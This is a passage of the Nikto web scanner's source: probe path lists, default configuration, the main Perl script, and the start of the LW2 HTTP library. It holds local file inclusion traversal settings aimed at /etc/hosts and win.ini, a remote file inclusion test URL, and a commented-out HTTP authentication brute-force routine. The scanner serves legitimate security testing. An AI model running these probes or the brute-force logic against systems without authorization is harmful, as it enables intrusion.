test-cgi.pl test.py test.sh tmUnblock.cgi uname.cgi viewcvs.cgi welcome whois.cgi\n@TYPO3=/ /cms/ /site/ /typo/ /typo3/\n@AXIS2=/ /axis/ /axis2/ /imcws/ /WebServiceImpl/ /dswsbobje/ /ws/\n@MODIR=/ /phpmoadmin/ /wu-moadmin/ /moadmin/\n@MOFILE=moadmin.php wu-moadmin.php\n@ADOBEXML=/flex2gateway/ /flex2gateway/http /flex2gateway/httpsecure /flex2gateway/cfamfpoolling /flex2gateway/amf /flex2gateway/amfpolling /messagebroker/http /messagebroker/httpsecure /blazeds/messagebroker/http /blazeds/messagebroker/httpsecure /samples/messagebroker/http /samples/messagebroker/httpsecure /lcds/messagebroker/http /lcds/messagebroker/httpsecure /lcds-samples/messagebroker/http /lcds-samples/messagebroker/httpsecure\n@JENKINS=/ /jenkins/ /hudson/\n@RAINLOOP=/ /rainloop/ /webmail/\n@TOMCATADMIN=/manager/ /jk-manager/ /jk-status/ /admin/ /host-manager/\n@PHPINFODIRS=/ /test/ /php/\n@PHPINFOFILES=phpinfo.php phpinfo.php3 test.php info.php index.php php_info.php\n@MANTIS=/ /mantis/ /mantisbt/\n@DOKUWIKI=/ /wiki/ /dokuwiki/\n@ROCKMONGO=/ /rockmongo/ /rock-mongo/\n@MAGENTO=/ /magento/ /shop/\n@MAGMI=/ /magmi/ /magmi-importer/ /magento/magmi/ /magento/magmi-importer/ /shop/magmi/ /shop/magmi-importer/\n@HYBRIS=/ /hmc/ /hac/\n@PIWIK=/ /piwik/ /analytics/\n@FORUM=/ /forum/ /forums/ /forumz/ /htforum/ /board/ /community/\n@VBULLETIN=/ /vb/ /vbulletin/ /forum/\n@PAGESPEED=/ngx_pagespeed_statistics /ngx_pagespeed_global_statistics /ngx_pagespeed_message /mod_pagespeed_statistics /mod_pagespeed_global_statistics /mod_pagespeed_message /pagespeed_console /pagespeed_admin/ /pagespeed_global_admin/\n@SYMPHONY=/ /cms/ /symphony/\n@CKEDITOR=/ /ckeditor/ /admin/ckeditor/ /sites/all/modules/ckeditor/ /resources/ckeditor/ /clientscript/ckeditor/ /wp-content/plugins/ckeditor-for-wordpress/ckeditor/\n@STRUTSACTIONS=/ /index.action /login.action\n@WORDPRESS=/ /wordpress/\n@INTERESTING_HEADERS=commerce-server-software daap-server dasl datacenter dav generator hosted-by hosted-with microsoftofficewebserver microsoftsharepointteamservices ms-author-via powered-by server-name serverid servlet-engine via x-aspnet-version x-blackboard-product x-cocoon-version x-compressed-by x-dmuser x-gallery-version x-hosted-at x-hostname x-isp x-powered-by x-responding-server x-served-by x-server x-server-name x-webserver x-owa-version access-control-allow-origin x-application-context cneonction nncoection xxx-real-ip bae-env-addr-sql-ip bae-env-addr-sql-port cf-connecting-ip fastly-client-ip incap-client-ip real-ip rlnclientipaddr true-client-ip x-clientip x-client-ip x-cluster-client-ip  x-ip x-nokia-ipaddress x-real-ip x-wap-network-client-ip reason-code\n\n# LFI variables\n@PLATFORMWIN=Microsoft|IIS|Windows|Win(NT|32|64|System.Web)\n@PLATFORMNIX=nix|BSD|SunOS|Solaris|AIX|Debian|HP-UX|Tru64\n@LFITGTNIX=/etc/hosts\n@LFITGTWIN=\\Windows\\win.ini\n@LFIPATHWIN=..\\\n@LFIPATHNIX=../\n@LFIDEPTH=8\n# Must be a DSL match for the platform's file\n@LFIMATCHWIN=BODY:\\[fonts\\]\n@LFIMATCHNIX=BODY:127[.]0[.]0[.]1&&BODY:localhost"
  },
  {
    "path": "program/nikto.conf.default",
    "content": "#########################################################################################################\n# CONFIG STUFF\n#########################################################################################################\n# This is the default config file. If you want to change it, we strongly suggest you copy it to nikto.conf\n# This will top it being over-ridden when you update.\n\n# default command line options, can't be an option that requires a value.  used for ALL runs.\n# CLIOPTS=-g -a\n\n# RFI URL. This remote file should return a phpinfo call, for example: <?php phpinfo(); ?>\n# You may use the one below, if you like.\nRFIURL=https://cirt.net/public/rfiinc.txt\n\n# IDs never to alert on (Note: this only works for IDs loaded from db_tests)\n#SKIPIDS=\n\n# The DTD\nNIKTODTD=templates/nikto.dtd\n\n# the default HTTP version to try... can/will be changed as necessary\nDEFAULTHTTPVER=1.1\n\n# Nikto can submit updated version strings to CIRT.net. It won't do this w/o permission. You should\n# send updates because it makes the data better for everyone ;)  *NO* server specific information\n# such as IP or name is sent, just the relevant version information.\n# UPDATES=yes  \t- ask before each submission if it should send\n# UPDATES=no   \t- don't ask, don't send\n# UPDATES=auto \t- automatically attempt submission *without prompting*\nUPDATES=yes\n\n# Prompt... if set to 'no' you'll never be asked for anything. Good for automation.\n#PROMPTS=no\n\n# Update server names\nCIRT=cirt.net\nVERSION_API=https://nikto-telemetry.csullo.workers.dev/products.json\n\n# Proxy settings -- still must be enabled by -useproxy\n#PROXYHOST=127.0.0.1\n#PROXYPORT=8080\n#PROXYUSER=proxyuserid\n#PROXYPASS=proxypassword\n\n# Cookies: send cookies with all requests\n# Multiple can be set by separating with a semi-colon, e.g.:\n# \"cookie1=cookie value\";\"cookie2=cookie val\" \n#STATIC-COOKIE=\"name=value\";\"something=nothing\";\n\n# The below allows you to vary which HTTP methods are used to check whether an HTTP(s) server \n# is running. Some web servers, such as the autopsy web server do not implement the HEAD method\nCHECKMETHODS=GET\n\n# If you want to specify the location of any of the files, specify them here\n# EXECDIR=/opt/nikto                    # Location of Nikto\n# PLUGINDIR=/opt/nikto/plugins          # Location of plugin dir\n# DBDIR=/opt/nikto/databases            # Location of database dir\n# TEMPLATEDIR=/opt/nikto/templates      # Location of template dir\n# DOCDIR=/opt/nikto/docs                # Location of docs dir\n\n# Default plugin macros\n# Remove plugins designed to be run standalone\n@@EXTRAS=dictionary;siebel\n@@DEFAULT=@@ALL;-@@EXTRAS;tests(report:500)\n\n# Choose SSL libs: \n# SSLeay        - use Net::SSLeay \n# SSL           - use Net::SSL  -- NOT recommended as it does not support SAN extraction\n# auto          - automatically choose best available \nLW_SSL_ENGINE=auto\n\n# Number of failures before giving up\n# Set to 0 to disable entirely\nFAILURES=20\n\n# Accessible IPv6 host for -check6 flag only\nCHECK6HOST=ipv6.google.com\nCHECK6PORT=443\n\n# SQL Direct Database Reporting\n# Database type: mysql or postgresql\n#DB_TYPE=mysql\n#DB_HOST=localhost\n#DB_PORT=3306\n#DB_NAME=nikto\n#DB_TABLE=nikto_table\n# NOTE: -> Set credentials in environment vars: NIKTO_DB_USER and NIKTO_DB_PASS\n"
  },
  {
    "path": "program/nikto.pl",
    "content": "#!/usr/bin/env perl\nuse strict;\n\n# Modules are now loaded in a function so errors can be trapped and evaluated\nload_modules();\n\n###############################################################################\n#                               Nikto                                         #\n###############################################################################\n# Copyright (C) 2001 Chris Sullo\n# SPDX-License-Identifier: GPL-3.0-only\n#\n# See the COPYING file for full information on the License Nikto is distributed under.\n#\n# http://cirt.net/\n#######################################################################\n# This program is intended for use in an authorized manner only, and the author\n# can not be held liable for anything done with this program, code, or items discovered\n# with this program's use.\n#######################################################################\n\n# global var/definitions\nuse vars qw/$TEMPLATES %CLI %VARIABLES %TESTS/;\nuse vars qw/%NIKTO %CONFIGFILE %COUNTERS %db_extensions %DSL_CACHE/;\nuse vars qw/@RESULTS @PLUGINS @DBFILE @REPORTS %CONTENTSEARCH/;\n\n# setup\n$COUNTERS{'scan_start'} = time();\n$VARIABLES{'name'}      = \"Nikto\";\n$VARIABLES{'version'}   = \"2.6.0\";\nGetopt::Long::Configure('no_ignore_case');\n\n# signal trap so we can close down reports properly\n$SIG{'INT'} = \\&safe_quit;\n\nconfig_init();\nsetup_dirs();\nrequire \"$CONFIGFILE{'PLUGINDIR'}/nikto_core.plugin\";\nrequire \"$CONFIGFILE{'PLUGINDIR'}/LW2.pm\";\nnprint(\"T:\" . localtime($COUNTERS{'scan_start'}) . \": Starting\", \"d\");\n\n# Set SSL engine and warn if Net::SSL is used\nLW2::init_ssl_engine($CONFIGFILE{'LW_SSL_ENGINE'});\nif ($LW2::_SSL_LIBRARY eq 'Net::SSL') {\n    nprint(\"+ WARNING: Net::SSL does not support SAN extraction. Use Net::SSLeay instead.\");\n}\n\ngeneral_config();\nnprint(\"- $VARIABLES{'name'} v$VARIABLES{'version'}\");\nnprint($VARIABLES{'DIV'});\n\n# No targets - quit before we do anything\nif ($CLI{'host'} eq '') {\n    if (!$CLI{'nocheck'}) {\n        check_updates();\n    }\n    nprint(\"+ ERROR: No host (-host) specified\");\n    usage(1);\n}\n\n$COUNTERS{'total_targets'} = $COUNTERS{'hosts_completed'} = 0;\nload_plugins();\n\n# Parse the supplied list of targets\nmy @MARKS = set_targets($CLI{'host'}, $CLI{'ports'}, $CLI{'ssl'}, $CLI{'root'});\n\n# Load tests\nload_databases();\nload_databases('u');\n\nif (defined($CLI{'key'}) || defined($CLI{'cert'})) {\n    $CLI{'key'}  = $CLI{'cert'} unless (defined($CLI{'key'}));\n    $CLI{'cert'} = $CLI{'key'}  unless (defined($CLI{'cert'}));\n}\n\n# Open reporting\nreport_head();\n$VARIABLES{'deferout'} = 1 unless $CLI{'display'} ne \"\";\n\n# Now check each target is real and remove duplicates/fill in extra information\nforeach my $mark (@MARKS) {\n    $mark->{'messages'} = [];\n    $mark->{'test'}     = 1;\n    $mark->{'failures'} = 0;\n    $mark->{'nf_cache'} = {};\n\n    # Try to resolve the host\n    my $msgs;\n    ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'display_name'}, $msgs) =\n      resolve($mark->{'ident'});\n    if ($msgs ne \"\") {\n        push(@{ $mark->{'messages'} }, $msgs);\n    }\n\n    # Load db_tests\n    set_scan_items();\n\n    # Start hook to allow plugins to load databases etc\n    run_hooks($mark, \"start\");\n\n    # Skip if we can't resolve the host - we'll error later\n    if (!defined $mark->{'ip'} || $mark->{'ip'} eq \"\") {\n        $mark->{'errmsg'} = $msgs;\n        $mark->{'test'}   = 0;\n        next;\n    }\n\n    # Read cookies from conf & set into the cookie jar\n    if (defined $CONFIGFILE{'STATIC-COOKIE'}) {\n        $mark->{'cookiejar'} = LW2::cookie_new_jar();\n        foreach my $p (split(/;/, $CONFIGFILE{'STATIC-COOKIE'})) {\n            if ($p =~ /\"([^=]+)=(.+)\"/) {\n                LW2::cookie_set(\\%{ $mark->{'cookiejar'} }, $1, $2);\n            }\n        }\n    }\n\n    if (defined $CLI{'vhost'}) {\n        $mark->{'vhost'} = $CLI{'vhost'};\n\n        # Update vhost flag immediately after assignment\n        $mark->{'has_vhost'} = ($mark->{'vhost'} ne '');\n    }\n    else {\n        # Update vhost flag for existing vhost value\n        $mark->{'has_vhost'} = (defined($mark->{'vhost'}) && $mark->{'vhost'} ne '');\n    }\n    $VARIABLES{'TEMPL_HCTR'}++;\n\n# Check that the port is open. Return value is overloaded, either 1 for open or an error message to convey\n    my $open =\n      port_check(time(), $mark->{'hostname'}, $mark->{'ip'}, $mark->{'port'}, $CLI{'key'},\n                 $CLI{'cert'}, $mark->{'vhost'});\n    if (($open != 1) && ($open != 2)) {\n        $mark->{'test'}   = 0;\n        $mark->{'errmsg'} = $open;\n        next;\n    }\n    else {\n        $COUNTERS{'total_targets'}++;\n    }\n    $mark->{'ssl'} = $open - 1;\n\n    if ($mark->{'ssl'}) {\n        $mark->{'key'}  = $CLI{'key'};\n        $mark->{'cert'} = $CLI{'cert'};\n    }\n}\n\n# Check for updates now that proxy is set up\nif (!$CLI{'nocheck'}) {\n    check_updates();\n}\n\n# Now we've done the precursor, do the scan\nforeach my $mark (@MARKS) {\n    $NIKTO{'current_mark'}  = $mark;\n    $VARIABLES{'deferout'}  = 1 unless $CLI{'display'} ne \"\";\n    $mark->{'total_vulns'}  = 0;\n    $mark->{'total_errors'} = 0;\n    $mark->{'start_time'}   = time();\n    report_host_start($mark);\n\n    if (!$mark->{'test'}) {\n        if ($mark->{'errmsg'} ne \"\") {\n            $VARIABLES{'deferout'} = 0;\n            add_vulnerability($mark, $mark->{'errmsg'}, \"FAIL\", \"\", \"GET\", \"/\", \"\", \"\",\n                              \"Failed to scan\");\n        }\n\n        report_host_end($mark);\n        $VARIABLES{'deferout'} = 1;\n        next;\n    }\n\n    if (defined $CLI{'vhost'}) {\n        $mark->{'vhost'} = $CLI{'vhost'};\n    }\n\n    # Update vhost flag after potential vhost assignment\n    $mark->{'has_vhost'} = (defined($mark->{'vhost'}) && $mark->{'vhost'} ne '');\n\n    # Saving responses\n    if ($CLI{'saveresults'} ne '') {\n        $mark->{'save_dir'}    = save_createdir($CLI{'saveresults'}, $mark);\n        $mark->{'save_prefix'} = save_getprefix($mark);\n    }\n\n    my ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/\", \"GET\", \"\", \"\", { noprefetch => 1, nopostfetch => 1 }, \"Init\");\n    $mark->{'platform'} = platform_profiler($mark);\n\n    # SSL info is now available - report it to all formats\n    report_ssl_info($mark);\n\n    $VARIABLES{'deferout'} = 0;\n    dump_target_info($mark);\n\n    # Now print any deferred output\n    if (@{ $VARIABLES{'defertxt'} }) {\n        foreach my $element (@{ $VARIABLES{'defertxt'} }) {\n            my @parts  = split(/::/, $element, 3);\n            my $mode   = $parts[0] || '';\n            my $testid = defined($parts[1]) && $parts[1] ne '' ? $parts[1] : undef;\n            my $line   = $parts[2] || $parts[1] || $element;\n            nprint($line, $mode, $testid);\n        }\n    }\n    undef $VARIABLES{'defertxt'};\n\n    run_hooks($mark, \"recon\");\n    run_hooks($mark, \"scan\");\n\n    $mark->{'end_time'} = time();\n    $mark->{'elapsed'}  = $mark->{'end_time'} - $mark->{'start_time'};\n\n    # Use singular/plural based on count\n    my $error_word = ($mark->{'total_errors'} == 1) ? \"error\" : \"errors\";\n    my $item_word  = ($mark->{'total_vulns'} == 1)  ? \"item\"  : \"items\";\n\n    if (!$mark->{'terminate'}) {\n        nprint(\n            \"+ $COUNTERS{'totalrequests'} requests: $mark->{'total_errors'} $error_word and $mark->{'total_vulns'} $item_word reported on the remote host\"\n            );\n    }\n    else {\n        nprint(\n            \"+ Scan terminated: $mark->{'total_errors'} $error_word and $mark->{'total_vulns'} $item_word reported on the remote host\"\n            );\n    }\n    nprint(  \"+ End Time:           \"\n           . date_disp($mark->{'end_time'})\n           . \" (GMT$VARIABLES{'GMTOFFSET'}) ($mark->{'elapsed'} seconds)\");\n    nprint($VARIABLES{'DIV'});\n\n    $COUNTERS{'hosts_completed'}++;\n    report_host_end($mark);\n}\n\n$COUNTERS{'scan_end'}     = time();\n$COUNTERS{'scan_elapsed'} = ($COUNTERS{'scan_end'} - $COUNTERS{'scan_start'});\nreport_summary();\nreport_close();\n\nnprint(\"+ $COUNTERS{'hosts_completed'} host(s) tested\");\nnprint(\"+ $COUNTERS{'totalrequests'} requests made in $COUNTERS{'scan_elapsed'} seconds\",\n       \"v\", \"END\");\n\nsend_updates(@MARKS);\n\nnprint(\"T:\" . localtime() . \": Ending\", \"d\");\n\nexit 0;\n\n#################################################################################\n# Load config files in order\nsub config_init {\n    my (@CF, $home);\n    my $config_exists = 0;\n\n    # read just the --config option\n    {\n        my %optcfg;\n        Getopt::Long::Configure('pass_through', 'noauto_abbrev');\n        GetOptions(\\%optcfg, \"config=s\");\n        Getopt::Long::Configure('nopass_through', 'auto_abbrev');\n        if (defined $optcfg{'config'}) { $VARIABLES{'configfile'} = $optcfg{'config'}; }\n    }\n\n    # Determine Nikto directory using FindBin (reliable even from zip/git sources)\n    # Use RealBin to get absolute path even if script was invoked via symlink\n    my $NIKTODIR = $FindBin::RealBin || $FindBin::Bin;\n    $NIKTODIR = File::Spec->rel2abs($NIKTODIR) if defined $NIKTODIR;\n\n    # Guess user's home directory -- to support Windows\n    foreach my $var (split(/ /, \"HOME USERPROFILE\")) {\n        $home = $ENV{$var} if ($ENV{$var});\n    }\n\n    # Read the conf files in order (local configs take precedence over system configs)\n    # Priority: --config option > local configs > user home > system-wide\n    push(@CF, \"$VARIABLES{'configfile'}\")\n      if defined $VARIABLES{'configfile'} && $VARIABLES{'configfile'} ne \"\";\n    push(@CF, File::Spec->catfile($NIKTODIR, \"nikto.conf\"))         if defined $NIKTODIR;\n    push(@CF, File::Spec->catfile($NIKTODIR, \"nikto.conf.default\")) if defined $NIKTODIR;\n    push(@CF, \"nikto.conf\");\n    push(@CF, File::Spec->catfile($home, \"nikto.conf\")) if defined $home;\n\n    # Only check /etc/nikto.conf on non-Windows systems\n    push(@CF, \"/etc/nikto.conf\") unless $^O =~ /MSWin32/;\n\n    # load in order (stop at first successful load)\n    for (my $i = 0 ; $i <= $#CF ; $i++) {\n        next if $CF[$i] eq \"\";\n        if (!load_config($CF[$i])) {\n            $config_exists = 1;\n            last;\n        }\n    }\n\n    # Couldn't find any\n    if ($config_exists == 0) {\n        die \"- Could not find a valid nikto config file. Tried: @CF\\n\";\n    }\n\n    # add CONFIG{'CLIOPTS'} to ARGV if defined...\n    if (defined $CONFIGFILE{'CLIOPTS'}) {\n        my @t = split(/ /, $CONFIGFILE{'CLIOPTS'});\n        foreach my $c (@t) { push(@ARGV, $c); }\n    }\n\n    # Check for necessary config items\n    check_config_defined(\"CHECKMETHODS\", \"HEAD\");\n    check_config_defined('@@DEFAULT',    '@@ALL');\n\n    return;\n}\n\n###############################################################################\nsub load_modules {\n    my $errors = 0;\n    my @modules = (\"Cwd 'abs_path'\",                                        \"File::Spec\",\n                   \"FindBin\",                                               \"Getopt::Long\",\n                   \"IO::Socket\",                                            \"JSON\",\n                   \"List::Util qw(sum)\",                                    \"Net::hostent\",\n                   \"POSIX qw(:termios_h)\",                                  \"Socket\",\n                   \"Time::HiRes qw(sleep ualarm gettimeofday tv_interval)\", \"Time::Local\",\n                   \"Time::Piece\",                                           \"Time::Seconds\",\n                   \"XML::Writer\"\n                   );\n\n    foreach my $mod (@modules) {\n        eval \"use $mod\";\n        if ($@) {\n\n            # Allow POSIX and Time::HiRes to fail on Windows\n            if (($mod =~ /^(POSIX|Time::HiRes)/) && $^O =~ /MSWin32/) {\n                next;\n            }\n            print STDERR \"ERROR: Required module not found: $mod\\n\";\n            $errors = 1;\n        }\n    }\n\n    if ($errors) { exit 1; }\n}\n\n#################################################################################\n# load config file\n# error=load_config(FILENAME)\nsub load_config {\n    my $configfile = $_[0] || return 1;\n\n    open(CONF, \"<$configfile\") || return 1;   # \"+ ERROR: Unable to open config file '$configfile'\";\n    my @CONFILE = <CONF>;\n    close(CONF);\n\n    foreach my $line (@CONFILE) {\n        $line =~ s/\\#.*$//;\n        chomp($line);\n        $line =~ s/\\s+$//;\n        $line =~ s/^\\s+//;\n        next if ($line eq \"\");\n        my @temp = split(/=/, $line, 2);\n        if ($temp[0] ne \"\") { $CONFIGFILE{ $temp[0] } = $temp[1]; }\n    }\n\n    return 0;\n}\n#################################################################################\n# find plugins directory\nsub setup_dirs {\n    my $CURRENTDIR = abs_path($0);\n    chomp($CURRENTDIR);\n    $CURRENTDIR =~ s#[\\\\/]nikto.pl$##;\n    $CURRENTDIR = \".\" if $CURRENTDIR =~ /^nikto.pl$/;\n\n    # First assume we get it from CONFIGFILE\n    unless (defined $CONFIGFILE{'EXECDIR'}) {\n        if (-d \"$ENV{'PWD'}/plugins\") {\n            $CONFIGFILE{'EXECDIR'} = $ENV{'PWD'};\n        }\n        elsif (-d \"$CURRENTDIR/plugins\") {\n            $CONFIGFILE{'EXECDIR'} = $CURRENTDIR;\n        }\n        elsif (-d \"./plugins\") {\n            $CONFIGFILE{'EXECDIR'} = $CURRENTDIR;\n        }\n        else {\n            print STDERR \"Could not work out the nikto EXECDIR, try setting it in nikto.conf\\n\";\n            exit 1;\n        }\n    }\n    unless (defined $CONFIGFILE{'PLUGINDIR'}) {\n        $CONFIGFILE{'PLUGINDIR'} = \"$CONFIGFILE{'EXECDIR'}/plugins\";\n    }\n    unless (defined $CONFIGFILE{'TEMPLATEDIR'}) {\n        $CONFIGFILE{'TEMPLATEDIR'} = \"$CONFIGFILE{'EXECDIR'}/templates\";\n    }\n    unless (defined $CONFIGFILE{'DOCDIR'}) {\n        $CONFIGFILE{'DOCDIR'} = \"$CONFIGFILE{'EXECDIR'}/docs\";\n    }\n    unless (defined $CONFIGFILE{'DBDIR'}) {\n        $CONFIGFILE{'DBDIR'} = \"$CONFIGFILE{'EXECDIR'}/databases\";\n    }\n    return;\n}\n\n######################################################################\n## check_config_defined(item, default)\n## Checks whether config has been set, warns and sets to a default\nsub check_config_defined {\n    my $item    = $_[0];\n    my $default = $_[1];\n\n    if (!defined $CONFIGFILE{$item}) {\n        print STDERR\n          \"- Warning: $item is not defined in Nikto configuration, setting to \\\"$default\\\"\\n\";\n        $CONFIGFILE{$item} = $default;\n    }\n\n    return;\n}\n"
  },
  {
    "path": "program/plugins/LW2.pm",
    "content": "#!perl\n# LW2 version 2.5.2\n#   LW2 Copyright (c) 2009, Jeff Forristal (wiretrip.net)\n#   All rights reserved.\n#\n#   Redistribution and use in source and binary forms, with or without \n#   modification, are permitted provided that the following conditions \n#   are met:\n#\n#   - Redistributions of source code must retain the above copyright \n#   notice, this list of conditions and the following disclaimer.\n#\n#   - Redistributions in binary form must reproduce the above copyright \n#   notice, this list of conditions and the following disclaimer in the \n#   documentation and/or other materials provided with the distribution.\n#\n#   THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \n#   \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT \n#   LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \n#   FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE \n#   COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, \n#   INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, \n#   BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; \n#   LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \n#   CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT \n#   LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN \n#   ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE \n#   POSSIBILITY OF SUCH DAMAGE.\n#\n#   Note that this file has been updated as part of the Nikto project,\n#   and is technically a fork of LibWhisker 2.5.\n\n=head1 NAME\n\nLW2 - Perl HTTP library version 2.5\n\n=head1 SYNOPSIS\n\nuse LW2;\n\nrequire 'LW2.pm';\n\n=head1 DESCRIPTION\n\nLibwhisker is a Perl library useful for HTTP testing scripts.  It\ncontains a pure-Perl reimplementation of functionality found in the C<LWP>,\nC<URI>, C<Digest::MD5>, C<Digest::MD4>, C<Data::Dumper>, C<Authen::NTLM>, \nC<HTML::Parser>, C<HTML::FormParser>, C<CGI::Upload>, C<MIME::Base64>,\nand C<GetOpt::Std> modules.\n\nLibwhisker is designed to be portable (a single perl file), fast (general\nbenchmarks show libwhisker is faster than LWP), and flexible (great care\nwas taken to ensure the library does exactly what you want to do, even\nif it means breaking the protocol).\n\n=head1 FUNCTIONS\n\nThe following are the functions contained in Libwhisker:\n\n=over 4\n\n=cut\n\n\npackage LW2;\n$LW2::VERSION=\"2.5\";\n$PACKAGE='LW2';\n\n# BEGIN is at the end of the file. Here come the functions.\n\n########################################################################\n#\n=item B<init_ssl_engine>\n\nParams: $lw_ssl_engine\n\nReturn: always returns undef\n\nThis function chooses the right SSL Engine and initializes SSL if needed.\nThis has been done because SSLeay seems to have memory leaks and there\nwas no other way to quickly change SSL Engine.\nlw_ssl_engine can have these values:\n\tauto \t= autodetection where it uses SSL first\n\t\t  (this is the default upon loading the module)\n\tSSL  \t= Net::SSL\n\tSSLeay \t= Net::SSLeay\n\nPrecondition for the function is that if you choose a specific library\nthis library must be installed.\n\n=cut\n\nsub init_ssl_engine {\n    my  ($lw_ssl_engine) = @_;\n\n    # if user-specified, undef initialization in case user's desired lib is not available\n    if ($lw_ssl_engine ne 'auto') { \n        $LW_SSL_LIB   = 0;\n        $_SSL_LIBRARY = undef;\n\t}\n\n    if ($lw_ssl_engine eq 'SSLeay'){\n\t# use Net::SSLeay as your SSL Library\n        eval \"use Net::SSLeay\";\n\tif ( !$@ ) { \n        \t$LW_SSL_LIB   = 1;\n        \t$_SSL_LIBRARY = 'Net::SSLeay';\n        \tNet::SSLeay::load_error_strings();\n        \tNet::SSLeay::SSLeay_add_ssl_algorithms();\n        \tNet::SSLeay::randomize();\n\t\t}\n\telse  { print STDERR \"ERROR: $@\\n\"; exit 1; }\n    } elsif ($lw_ssl_engine eq 'SSL'){\n        # use Net:SSL\n        eval \"use Net::SSL\";\n\tif ( !$@ ) { \n        \t$LW_SSL_LIB   = 2;\n        \t$_SSL_LIBRARY = 'Net::SSL';\n\t\t}\n\telse  { print STDERR \"ERROR: $@\\n\"; exit 1; }\n    } \n\telse {\n\t# assuming autodetection\n\teval \"use Net::SSLeay\";\n    if ( !$@ ) {\n                $LW_SSL_LIB   = 1;\n                $_SSL_LIBRARY = 'Net::SSLeay';\n                Net::SSLeay::load_error_strings();\n                Net::SSLeay::SSLeay_add_ssl_algorithms();\n                Net::SSLeay::randomize();\n                }\n\telse {\n        eval \"use Net::SSL\";\n        if ( !$@ ) {\n                $LW_SSL_LIB   = 2;\n                $_SSL_LIBRARY = 'Net::SSL';\n\t\t        }\n\t\t}\n    }\n\nreturn undef;\n\n} #sub\n\n########################################################################\n# Module Initialization starts here\nBEGIN {\npackage LW2;\n$PACKAGE='LW2';\n    ## LW module manager stuff ##\n\n    $LW_SSL_LIB          = 0;\n    $LW_SSL_KEEPALIVE    = 0;\n    $LW_NONBLOCK_CONNECT = 1;\n\n    $_SSL_LIBRARY = undef;\n\n    # These IPv4 & IPv6 regexps are from Regexp::IPv6\n    my $IPv4 = \"((25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2}))\";\n\n    our $IPv4_re = $IPv4;\n    $IPv4_re =~ s/\\(/(?:/g;\n    $IPv4_re = qr/$IPv4_re/;\n\n    my $G = \"[0-9a-fA-F]{1,4}\";\n\n    my @tail = ( \":\",\n\t    \"(:($G)?|$IPv4)\",\n        \":($IPv4|$G(:$G)?|)\",\n        \"(:$IPv4|:$G(:$IPv4|(:$G){0,2})|:)\",\n        \"((:$G){0,2}(:$IPv4|(:$G){1,2})|:)\",\n        \"((:$G){0,3}(:$IPv4|(:$G){1,2})|:)\",\n        \"((:$G){0,4}(:$IPv4|(:$G){1,2})|:)\" );\n\n    our $IPv6_re = $G;\n    $IPv6_re = \"$G:($IPv6_re|$_)\" for @tail;\n    $IPv6_re = qq/:(:$G){0,5}((:$G){1,2}|:$IPv4)|$IPv6_re/;\n    $IPv6_re =~ s/\\(/(?:/g;\n    $IPv6_re = qr/$IPv6_re/;\n    \n    our $IPv6_re_inc_zoneid = qr/$IPv6_re(?:[%][a-z0-9]+)?/;\n    \n    # check for Socket\n    eval \"use Socket qw(:DEFAULT :addrinfo SOCK_STREAM inet_pton pack_sockaddr_in6)\"; # Have IPv6-capable Socket.pm?\n    if ($@) { # No IPv6, fallback to older Socket test\n        eval \"use Socket\";   \n        if ( $@ ) {\n\t        die('You have to install the module Socket');\n        }\n    }    \n    our $LW2_CAN_IPv6 = ( $@) ? 0 : 1;\n    \n    # init SSL with autoconfig first. App can later override this\n    init_ssl_engine('auto');\n\n    if ( $^O !~ /Win32/ ) {\n        eval \"use POSIX qw(:errno_h :fcntl_h)\";\n        if ($@) { $LW_NONBLOCK_CONNECT = 0; }\n    }\n    else {\n\n        # taken from Winsock2.h\n        *EINPROGRESS = sub { 10036 };\n        *EWOULDBLOCK = sub { 10035 };\n    }\n    \n} # BEGIN\n\n\n########################################################################\n\n=item B<auth_brute_force>\n\nParams: $auth_method, \\%req, $user, \\@passwords [, $domain, $fail_code ]\nReturn: $first_valid_password, undef if error/none found\n\nPerform a HTTP authentication brute force against a server (host and URI \ndefined in %req).  It will try every password in the password array for \nthe given user.  The first password (in conjunction with the given user) \nthat doesn't return HTTP 401 is returned (and the brute force is stopped \nat that point).  You should retry the request with the given password and\ndouble-check that you got a useful HTTP return code that indicates\nsuccessful authentication (200, 302), and not something a bit more \nabnormal (407, 500, etc).  $domain is optional, and is only used for NTLM\nauth.\n\nNote: set up any proxy settings and proxy auth in %req before calling\nthis function.\n\nYou can brute-force proxy authentication by setting up the target proxy\nas proxy_host and proxy_port in %req, using an arbitrary host and uri\n(preferably one that is reachable upon successful proxy authorization),\nand setting the $fail_code to 407.  The $auth_method passed to this\nfunction should be a proxy-based one ('proxy-basic', 'proxy-ntlm', etc).\n\nif your server returns something other than 401 upon auth failure, then\nset $fail_code to whatever is returned (and it needs to be something\n*different* than what is received on auth success, or this function\nwon't be able to tell the difference).\n\n=cut\n\n# sub auth_brute_force {\n#     my ( $auth_method, $hrin, $user, $pwordref, $dom, $fail_code ) = @_;\n#     my ( $P, %hout );\n#     $fail_code ||= 401;\n\n#     return undef if ( !defined $auth_method || length($auth_method) == 0 );\n#     return undef if ( !defined $user        || length($user) == 0 );\n#     return undef if ( !( defined $hrin     && ref($hrin) ) );\n#     return undef if ( !( defined $pwordref && ref($pwordref) ) );\n\n#     map {\n#         ( $P = $_ ) =~ tr/\\r\\n//d;\n#         auth_set( $auth_method, $hrin, $user, $P, $dom );\n#         return undef if ( http_do_request( $hrin, \\%hout ) );\n#         return $P if ( $hout{whisker}->{code} != $fail_code );\n#     } @$pwordref;\n\n#     return undef;\n# 